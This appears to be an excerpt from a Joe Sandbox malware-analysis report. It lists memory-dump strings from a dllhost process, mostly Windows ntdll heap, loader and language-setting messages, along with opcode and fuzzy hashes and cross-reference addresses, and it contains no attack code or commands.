                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-2160512332
                                                                                                      • Opcode ID: 82b711d7011bfd9a11c91408cef39ea0f360fc04774e3fd6f055fa59162e3098
                                                                                                      • Instruction ID: 1b73f29fba6254ebbe856f0aa793c61693db2fe6531ebebed6552073b5d78e73
                                                                                                      • Opcode Fuzzy Hash: 82b711d7011bfd9a11c91408cef39ea0f360fc04774e3fd6f055fa59162e3098
                                                                                                      • Instruction Fuzzy Hash: D4927D79608745AFD720EFA4C880B6AB7E8BF84714F084D9DFA95DB250D770E844CB92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                      • API String ID: 0-3591852110
                                                                                                      • Opcode ID: 0d48271328013b903b185afbc69e8076029e03e46d511b6b14e457183dfaf224
                                                                                                      • Instruction ID: 497ccf214c6843d10dbb6159637aefdaf5111b3d86cac3df2f9192c91014a776
                                                                                                      • Opcode Fuzzy Hash: 0d48271328013b903b185afbc69e8076029e03e46d511b6b14e457183dfaf224
                                                                                                      • Instruction Fuzzy Hash: A5128974600646DFD725CFA8C469ABABBF5BF0A714F188499E496CF742D734E880CB90
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                      • API String ID: 0-3532704233
                                                                                                      • Opcode ID: 1e8ec5997ab7f6f92414b89d134d0a06405dae687b088a79b6bda08e8a211072
                                                                                                      • Instruction ID: 7d2c240d334c45a168f6adf3989c6551ad386e808a6b706d39b8645956bc76b5
                                                                                                      • Opcode Fuzzy Hash: 1e8ec5997ab7f6f92414b89d134d0a06405dae687b088a79b6bda08e8a211072
                                                                                                      • Instruction Fuzzy Hash: 51B1AC725083559FC725DF68C480B6BBBE8BB88754F05096EFA99DB304D734D908CB92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                      • API String ID: 2994545307-3063724069
                                                                                                      • Opcode ID: 7a2300505e749a58f916b41750aad805b3d2a3f97760e7c3b4255c0a9e2078bc
                                                                                                      • Instruction ID: 9d126e08f1185599fac635d1a93efaa5127cbc578c0eb1f8696a82f5e13b7eb7
                                                                                                      • Opcode Fuzzy Hash: 7a2300505e749a58f916b41750aad805b3d2a3f97760e7c3b4255c0a9e2078bc
                                                                                                      • Instruction Fuzzy Hash: 2DD1D4B2804355AFEB22DAD8C841B6FB7ECAF88714F0949AEFA44DB150D770C9448793
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                      • API String ID: 0-1700792311
                                                                                                      • Opcode ID: 6bf27940ebfa0a877bb4c8054e6dc310ff5867cc16b4797d923b477a9f36b2f2
                                                                                                      • Instruction ID: ca0c7ade49c0e38321a8312e457484aeb08766569d97ef3d603fdfaf10716fa4
                                                                                                      • Opcode Fuzzy Hash: 6bf27940ebfa0a877bb4c8054e6dc310ff5867cc16b4797d923b477a9f36b2f2
                                                                                                      • Instruction Fuzzy Hash: 05D1AAB950078ADFCB16EFA8C444AAEFBF1FF4A614F088099E555DB752C734A981CB10
                                                                                                      Strings
                                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 037FD262
                                                                                                      • @, xrefs: 037FD313
                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 037FD2C3
                                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 037FD196
                                                                                                      • @, xrefs: 037FD0FD
                                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 037FD146
                                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 037FD0CF
                                                                                                      • @, xrefs: 037FD2AF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                      • API String ID: 0-1356375266
                                                                                                      • Opcode ID: b0059974b0be61bd5a8a1f88be113f359d56420746f3a40002c8744dfc8ef1d2
                                                                                                      • Instruction ID: d63365e9469ecccab45729d73858e894abbe150f54ce69ef09e6b3012e3ec0a3
                                                                                                      • Opcode Fuzzy Hash: b0059974b0be61bd5a8a1f88be113f359d56420746f3a40002c8744dfc8ef1d2
                                                                                                      • Instruction Fuzzy Hash: 75A139719083459FD721DF65C484BABB7E8BF88715F004A6EFA98DA240E774D908CB93
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-523794902
                                                                                                      • Opcode ID: 6f4a2b78da3f2494d2f7dc8309a580dfbbcc5ee204edbfb4a5266ac9ded9a445
                                                                                                      • Instruction ID: 237b0bb99391844dc4bbd719fbfeee35bdbfffce46094e89d820ae35d538b990
                                                                                                      • Opcode Fuzzy Hash: 6f4a2b78da3f2494d2f7dc8309a580dfbbcc5ee204edbfb4a5266ac9ded9a445
                                                                                                      • Instruction Fuzzy Hash: 50420D75208781CFC714DF68C884A6ABBE5FF88204F1849ADF996CB342DB30E945CB12
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                      • API String ID: 0-122214566
                                                                                                      • Opcode ID: 42734a8c2bf7cceeace21dad820faa6b072063497e29e69cbf50538b1277546f
                                                                                                      • Instruction ID: ad601c6b5e1f7434f0d5c572ff3a363a07c6312b052fea7c1222763f55ceaa7e
                                                                                                      • Opcode Fuzzy Hash: 42734a8c2bf7cceeace21dad820faa6b072063497e29e69cbf50538b1277546f
                                                                                                      • Instruction Fuzzy Hash: DAC11871A002599BDB26DFE8C891BBEF7ADAF85314F1840E9D806DB280D7B4D964C391
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-792281065
                                                                                                      • Opcode ID: 4968e0c9a92358ac53e5ff7543ad5eec5a990e499632100589274204eeb9a179
                                                                                                      • Instruction ID: 874ef99750a53b7f574cab7e502a00d6980e71b75735b791c4fe589af69e6177
                                                                                                      • Opcode Fuzzy Hash: 4968e0c9a92358ac53e5ff7543ad5eec5a990e499632100589274204eeb9a179
                                                                                                      • Instruction Fuzzy Hash: 0F910574A01714AFDB24FBE9D884B6AB7A5EF42B14F1801E8E510EB381E7B49841C7D1
                                                                                                      Strings
                                                                                                      • LdrpInitializeProcess, xrefs: 0383C6C4
                                                                                                      • LdrpInitializeImportRedirection, xrefs: 03878177, 038781EB
                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 03878170
                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 038781E5
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0383C6C3
                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 03878181, 038781F5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                      • API String ID: 0-475462383
                                                                                                      • Opcode ID: e692392b5cd6388335d99134df6c9201b967f4052427d067a8314ceb29a54483
                                                                                                      • Instruction ID: 8275ddbbe61d82c71cbd385c1eca9da934675951d4fa71d1653906951531148c
                                                                                                      • Opcode Fuzzy Hash: e692392b5cd6388335d99134df6c9201b967f4052427d067a8314ceb29a54483
                                                                                                      • Instruction Fuzzy Hash: A531E4B56487459FC214EFACD94AE1AB7A5EF85B10F0405ECF851EB391EA60EC04C7A3
                                                                                                      Strings
                                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 0382527B
                                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 03825352
                                                                                                      • Kernel-MUI-Language-SKU, xrefs: 0382542B
                                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 03825247
                                                                                                      • WindowsExcludedProcs, xrefs: 0382522A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                      • API String ID: 0-258546922
                                                                                                      • Opcode ID: 930d2edb7c33e2ab017f3b113058fbb4ff32bc3f73b18efa3e8657883cc5268e
                                                                                                      • Instruction ID: db49d7c1e96c9b0d8e4376af2a7b1e05063e71d7f72aec70a8149c8c9aca6258
                                                                                                      • Opcode Fuzzy Hash: 930d2edb7c33e2ab017f3b113058fbb4ff32bc3f73b18efa3e8657883cc5268e
                                                                                                      • Instruction Fuzzy Hash: 24F13B76D50228EFCB15DFE9C9809AEFBB9EF49654F1400AAE401EB210E7709E41CB90
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-1975516107
                                                                                                      • Opcode ID: b823eed8a9de8a036bcc09aa2bc9e2cb9afe255b7f5369702a9dd4e353aef35d
                                                                                                      • Instruction ID: 04c757846b5d94a20eacb041f382c27de849989a00cd7719c3693be203808ffc
                                                                                                      • Opcode Fuzzy Hash: b823eed8a9de8a036bcc09aa2bc9e2cb9afe255b7f5369702a9dd4e353aef35d
                                                                                                      • Instruction Fuzzy Hash: A451BD75A007599FCB14EFE8D484BADBFB1BF48304F2845D9D921AB291D774A889CB80
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                      • API String ID: 0-3178619729
                                                                                                      • Opcode ID: 73e6c6c862869366935fed1801812000eec05c9eebe2f8349c07b444afa4a29d
                                                                                                      • Instruction ID: 3ce662f8722655eaa0e1508cb9b56f8b85ccdf7a46184f623af8a2606af8f184
                                                                                                      • Opcode Fuzzy Hash: 73e6c6c862869366935fed1801812000eec05c9eebe2f8349c07b444afa4a29d
                                                                                                      • Instruction Fuzzy Hash: CF13AC70A006598FDB25CFA8C4817A9FBF9BF49304F1881EDE849EB381D774A955CB90
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-3570731704
                                                                                                      • Opcode ID: 2e0cc1addc579fad6871ec86c534c53ba3d9dd9e01a0d2666e7b60d56dbbf7b4
                                                                                                      • Instruction ID: 3b3c82966110402436e69b560768b737ff955682759a20473cb74c7afe464ada
                                                                                                      • Opcode Fuzzy Hash: 2e0cc1addc579fad6871ec86c534c53ba3d9dd9e01a0d2666e7b60d56dbbf7b4
                                                                                                      • Instruction Fuzzy Hash: 22924A75A00269CFEB24CFA8CC44BA9B7B9BF45314F1981EAD949EB240D7749E80CF51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                      • API String ID: 0-379654539
                                                                                                      • Opcode ID: 26ee1d7061b9fbe484aae9497716858ba2ad07fc25f3234caf0aed6bc50bc1c1
                                                                                                      • Instruction ID: 021adea02c101998d531c740c3262c25c4aa77d351207a45af7c098849bc8bd3
                                                                                                      • Opcode Fuzzy Hash: 26ee1d7061b9fbe484aae9497716858ba2ad07fc25f3234caf0aed6bc50bc1c1
                                                                                                      • Instruction Fuzzy Hash: 51C17C781087868FC759CF98C840B6AB7F4BF85708F0449E9F895CB291E739CA49CB52
                                                                                                      Strings
                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 038722B6
                                                                                                      • .Local, xrefs: 038328D8
                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 038721DE
                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 038721D9, 038722B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                      • API String ID: 0-1239276146
                                                                                                      • Opcode ID: de3dc2024a246c4716d7912d296f05a0aed2b18e1aa37efd97f1208491869907
                                                                                                      • Instruction ID: 4f6a7f9a9d5ecb6b34e6432235f11e1895f7dcf2bab9fdee159be617495326f1
                                                                                                      • Opcode Fuzzy Hash: de3dc2024a246c4716d7912d296f05a0aed2b18e1aa37efd97f1208491869907
                                                                                                      • Instruction Fuzzy Hash: 26A18A35A0122D9BCB24CFA4D884BA9B3B5BF59314F1849EAD808EB351D770DE81CF91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                      • API String ID: 0-2586055223
                                                                                                      • Opcode ID: 520fa2d2363a24cdbda4bbddc25bd21404b9dc6e6e2aacccf4ca724b4c5dc18c
                                                                                                      • Instruction ID: 7aa0a23ee4eabff1620097d18ecaee6df36b01f919999125959d40661c93f5f5
                                                                                                      • Opcode Fuzzy Hash: 520fa2d2363a24cdbda4bbddc25bd21404b9dc6e6e2aacccf4ca724b4c5dc18c
                                                                                                      • Instruction Fuzzy Hash: 1661E3762047819FD711DBA8CC44FA6B7E9FB84714F0804A9FA55CB391DB74EA40C762
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                      • API String ID: 0-336120773
                                                                                                      • Opcode ID: 2f9859b5b66b22dc0186829862bb8f3407531068ff88853a17e95f66d0f2cc42
                                                                                                      • Instruction ID: e7fdef9f7221910e8b5d9d6f48e6fb781f60e72559089dbf624529dcd9546360
                                                                                                      • Opcode Fuzzy Hash: 2f9859b5b66b22dc0186829862bb8f3407531068ff88853a17e95f66d0f2cc42
                                                                                                      • Instruction Fuzzy Hash: C8311076210205EFD710DBE8C899FAAB3F9FF05624F284195F595CF391D630AC40CA65
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                      • API String ID: 0-1391187441
                                                                                                      • Opcode ID: 5b2889f410b7f23ba405cfcd364581e08024f7a3fa78c9cad64b8b5318d9d69f
                                                                                                      • Instruction ID: 32f47351f1903debd26e01b069ef57fb9999b6df7ca9b4dec77add559ed31742
                                                                                                      • Opcode Fuzzy Hash: 5b2889f410b7f23ba405cfcd364581e08024f7a3fa78c9cad64b8b5318d9d69f
                                                                                                      • Instruction Fuzzy Hash: 1B31B476610208EFC712DB99C889F9EB7B8FF45620F2440A5FA14EB291D770ED40CA61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
